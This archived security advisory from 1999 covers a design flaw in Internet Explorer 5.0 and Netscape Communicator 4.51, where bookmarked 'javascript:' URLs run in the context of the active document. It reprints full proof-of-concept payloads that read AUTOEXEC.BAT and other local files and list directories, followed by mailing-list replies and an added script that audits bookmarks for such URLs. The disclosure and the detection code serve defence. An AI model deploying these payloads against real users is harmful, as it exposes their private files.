browser.bookmarks.txt

17 Aug 1999. Reported by Packet Storm. Type: packetstorm. Source: packetstormsecurity.com

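A design flaw in bookmark handling in Internet Explorer 5.0 and Netscape Communicator 4.51 lets a bookmarked "javascript:" URL run in the context of the active document, exposing local files when that document is a local file.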

Code
`Date: Sun, 9 May 1999 17:34:10 +0300  
From: Georgi Guninski <[email protected]>  
To: [email protected]  
Subject: Bookmarks security vulnerabilities in both Internet Explorer 5.0 and Netscape Communicator 4.51 (Win95)  
  
  
There is a design flaw in both Internet Explorer 5.0 and Netscape Communicator 4.51 Win95  
(guess all 4.x versions of both browsers are vulnerable too) in the way they handle bookmarks.  
The problem arises if the user bookmarks (adds to favorites) and later chooses a specially designed  
"javascript:" URL. When the bookmark is chosen later, the JavaScript code in it  
is executed in the context (the same domain and protocol) of the document  
opened prior to choosing the bookmark. So, the JavaScript code has access to  
documents in the same domain. An interesting case is choosing the bookmark  
when the active document is a local file (the protocol is "file:") - then the  
JavaScript code has access to local files and directories.  
The vulnerabilities are more serious for Internet Explorer 5.0.  
  
Some of the vulnerabilities are:  
  
For Internet Explorer 5.0:  
Reading local files if the filename is known;  
Reading files in the domain of the active document (even if the web server is blocked by a firewall);  
Reading links in the active document and in documents in the same domain;  
Web spoofing of documents in the domain of the active document;  
  
Demonstration is available at: http://www.nat.bg/~joro/favorites.html  
  
For Netscape Communicator 4.51:  
Browsing local directories;  
Reading local files in the directory of the active document;  
Reading links in the active document and in documents in the same domain;  
Web spoofing of documents in the domain of the active document;  
  
Demonstration is available at: http://www.nat.bg/~joro/bookmarks.html  
  
Workaround: Disable JavaScript or do not bookmark untrusted pages  
  
Georgi Guninski  
http://www.nat.bg/~joro  
http://www.whitehats.com/guninski  
  
-------------------------------------------------------------------------------  
  
<http://www.nat.bg/~joro/favorites.html>  
  
<HTML>  
<HEAD>  
<TITLE>  
IE 5.0 "Favorites" vulnerability  
</TITLE>  
</HEAD>  
There is a design flaw in Internet Explorer 5.0 (guess 4.x is vulnerable too) in the way it handles favorites.  
This vulnerability allows reading local files and sending them to an arbitrary server.  
<BR>  
If a user adds to favorites a specially designed "javascript:" URL, later opens a local file and then chooses the URL from the Favorites, his local files may be read if the filename is known.  
<BR>  
Probably there are more serious exploits.  
<BR><BR>  
Demonstration:  
<BR>  
<BR>  
<A HREF="javascript:if(window.location.href.substr(0,5)=='file:') {html='AUTOEXEC.BAT reading<object id=\'myTDC\' width=100 height=100 classid=\'CLSID:333C7BC4-460F-11D0-BC04-0080C7055A83\'><param name=\'DataURL\' value=\'c:/autoexec.bat\'><param name=\'UseHeader\' value=False><param name=\'CharSet\' VALUE=\'iso-8859-1\'><param name=\'FieldDelim\' value=\'}\'><param name=\'RowDelim\' value=\'}\'><param name=\'TextQualifier\' value=\'}\'></object><form><textarea datasrc=\'#myTDC\' datafld=\'Column1\' rows=10 cols=80></textarea></form><SCRIPT>s=\'Here is your AUTOEXEC.BAT:\';setTimeout(\'alert(s+document.forms[0].elements[0].value)\',4000)</SCRIPT>';a=window.open(window.location);a.document.open();a.document.write(html);a.document.close();} s='<TITLE>Reading AUTOEXEC.BAT</TITLE>This page demonstrates reading AUTOEXEC.BAT with IE 5.0<BR>To test it:<BR>1) Add this page to favorites (Favorites|Add to favorites...)<BR>2) Open a local html, gif or jpeg file with IE (the protocol must be \'file://\')<BR>3) Choose from favorites the page you added in step 1)<HR>Written by <A HREF=\'http://www.nat.bg/~joro\'>Georgi Guninski</'+'A>'">  
Reading AUTOEXEC.BAT  
</A>  
  
<BR>  
  
<A HREF="javascript:if(window.location.href.substr(0,5)=='file:') {a=window.open('file://c:/test.txt');alert(a.document.body.innerText);a.close();}html='<TITLE>Reading TEST.TXT</TITLE>This page demonstrates reading the file C:\\TEST.TXT with IE 5.0<BR>To test it:<BR>1) Add this page to favorites (Favorites|Add to favorites...)<BR>2) Open a local html, gif or jpeg file with IE (the protocol must be \'file://\')<BR>3) Create a short text file C:\\TEST.TXT<BR>4) Choose from favorites the page you added in step 1)<HR>Written by <A HREF=\'http://www.nat.bg/~joro\'>Georgi Guninski</'+'A>';">  
Reading file "c:\test.txt"  
</A>  
  
<BR>  
Workaround: Disable Javascript or do not add to favorites untrusted pages.  
</HTML>  
  
-------------------------------------------------------------------------------  
  
<http://www.nat.bg/~joro/bookmarks.html>  
  
<HTML>  
<HEAD>  
<TITLE>  
Netscape Communicator bookmark vulnerabilities  
</TITLE>  
</HEAD>  
There is a design flaw in Netscape Communicator 4.51/Win95 (guess all 4.x versions are vulnerable) in the way it handles bookmarks.  
<BR>  
This allows at least browsing local directories, reading local files and sending them to an arbitrary server. Probably there are more serious exploits.  
<BR>  
If the user bookmarks a specially designed "javascript:" URL, later opens a local file and then chooses the bookmark, the bug is triggered.  
<BR>  
  
<BR>  
Demonstration:  
<BR>  
<A HREF="javascript:if(window.location.href.substr(0,5)=='file:') {a=window.open('wysiwyg://1/file:///c|/');s='Here are some files in your C: drive:\n';for(i=1;i<5;i++) s+= a.document.links[i]+'\n';alert(unescape(s));a.close();} html='<TITLE>Browsing directories with Netscape Communicator</TITLE>This page demonstrates browsing direcotries with Netscape Communicator<BR>To test it:<BR>1) Bookmark this page (Bookmarks|Add Bookmark)<BR>2) Open a local html, text, gif, ... file or just browse directories with Netscape Communicator (the protocol must be \'file://\')<BR>3) Choose from bookmarks the page you added in step 1)<HR>Written by <A HREF=\'http://www.nat.bg/~joro\'>Georgi Guninski</'+'A>';">  
Browsing directories  
</A>  
  
<BR>  
  
<A HREF="javascript:if(window.location.href.substr(0,5)=='file:') {var f = new java.io.File('C:\\AUTOEXEC.BAT');var fis = new java.io.FileInputStream(f); i=0; b='Here is your file: \n';while ( ((a=fis.read()) != -1) && (i<1000) ) { b += String.fromCharCode(a);i++;}alert(b);}; html='<TITLE>Reading AUTOEXEC.BAT with Netscape Communicator</TITLE>This page demonstrates reading AUTOEXEC.BAT with Netscape Communicator<BR>To test it:<BR>1) Bookmark this page (Bookmarks|Add Bookmark)<BR>2) Open a local html, text, gif, ... file in the root of C:\\ or just browse the root of C:\\ with Netscape Communicator (typing \'file:///c|/\' would do)<BR>It is possible to read any local file in the direcotry the user has opened<BR>3) Choose from bookmarks the page you added in step 1)<HR>Written by <A HREF=\'http://www.nat.bg/~joro\'>Georgi Guninski</'+'A>';">  
Reading AUTOEXEC.BAT  
</A>  
<BR>  
Workaround: Disable Javascript or do not bookmark untrusted pages.  
</HTML>  
  
-------------------------------------------------------------------------------  
  
Date: Tue, 11 May 1999 21:59:32 -0700  
From: Jim Reavis <[email protected]>  
To: [email protected]  
Subject: Re: Bookmarks security vulnerabilities in both Internet Explorer 5.0 and Netscape Communicator 4.51 (Win95)  
  
I did get this to work as described with IE 5.0 on Win 95. It failed until  
I re-read the directions and opened a local GIF with the "file:///" syntax  
versus "c:\"  
  
Using NT SP5, I got an access denied in a large dialog box that contained  
Georgi's code. He didn't mention NT in his original advisory, so I assume  
it is just a Win 9X issue?  
  
Jim Reavis  
SecurityPortal.com - the focal point for security on the Net  
[email protected] <mailto:[email protected]>  
  
  
  
-----Original Message-----  
From: Russ [mailto:[email protected]]  
Sent: Monday, May 10, 1999 2:20 PM  
To: [email protected]  
Subject: Re: Bookmarks security vulnerabilities in  
both Internet Explorer 5.0 and Netscape Communicator 4.51 (Win95)  
  
I am unable to reproduce this on IE 5.0 with SP5. I get an error message  
stating "Cannot find server or DNS error" after following Georgi's  
instructions using TEST.TXT.  
  
Even pasting the entire script in the address box fails to reproduce his  
described effects.  
  
Cheers,  
Russ - NTBugtraq moderator  
  
`
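
The advisory's workaround is to avoid bookmarking untrusted pages; saved bookmarks can also be audited for "javascript:" URLs after the fact. The following is an added example, not part of the original advisory or of either browser's code. It assumes the Netscape bookmark-file HTML layout (`<DT><A HREF=...>`) and IE Favorites stored as `.url` shortcut files; all function names and sample data are constructed for illustration.

```javascript
// Added example: flag bookmarks whose URL resolves to the "javascript:" scheme.
// Assumption: HREF values are HTML-decoded by the browser before use.
function decodeEntities(s) {
  const named = { amp: '&', quot: '"', lt: '<', gt: '>', colon: ':', Tab: '\t', NewLine: '\n' };
  return s.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);?/gi, (m, e) => {
    if (e[0] === '#') {
      const cp = /^#x/i.test(e) ? parseInt(e.slice(2), 16) : parseInt(e.slice(1), 10);
      return cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
    }
    return Object.prototype.hasOwnProperty.call(named, e) ? named[e] : m;
  });
}

// Browsers ignore leading control characters/spaces and drop tab, CR and LF
// anywhere in a URL, so normalise the same way before reading the scheme.
function urlScheme(raw) {
  const s = raw.replace(/^[\u0000-\u0020]+/, '').replace(/[\t\r\n]/g, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(s);
  return m ? m[1].toLowerCase() : null;
}

// Netscape bookmark file: one <A HREF="..."> anchor per bookmark.
function auditNetscapeBookmarks(html) {
  const hits = [];
  const re = /<A\s[^>]*?HREF\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))[^>]*>([\s\S]*?)<\/A>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const url = decodeEntities(m[1] ?? m[2] ?? m[3]);
    if (urlScheme(url) === 'javascript') hits.push({ title: m[4].trim(), url });
  }
  return hits;
}

// IE favorite: an INI-style .url file with a URL= line under [InternetShortcut].
function auditInternetShortcut(name, text) {
  const m = /^URL[ \t]*=[ \t]*(.*)$/im.exec(text);
  return m && urlScheme(m[1]) === 'javascript' ? [{ title: name, url: m[1].trim() }] : [];
}

// Constructed sample data (not taken from the advisory).
const sampleBookmarks = [
  '<DT><A HREF="http://example.com/" ADD_DATE="926260450">Example</A>',
  '<DT><A HREF="javascript:void(0)" ADD_DATE="926260451">Demo page</A>',
  '<DT><A HREF=" &#74;ava&Tab;script&colon;void(0)">Obfuscated</A>',
  '<DT><A HREF="http://example.com/?q=javascript:">Benign query</A>',
].join('\n');
console.log(auditNetscapeBookmarks(sampleBookmarks).map((h) => h.title));
```

A flagged entry is not necessarily malicious, but it will run in the context of whatever document is active when it is chosen, which is the behaviour the advisory describes.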
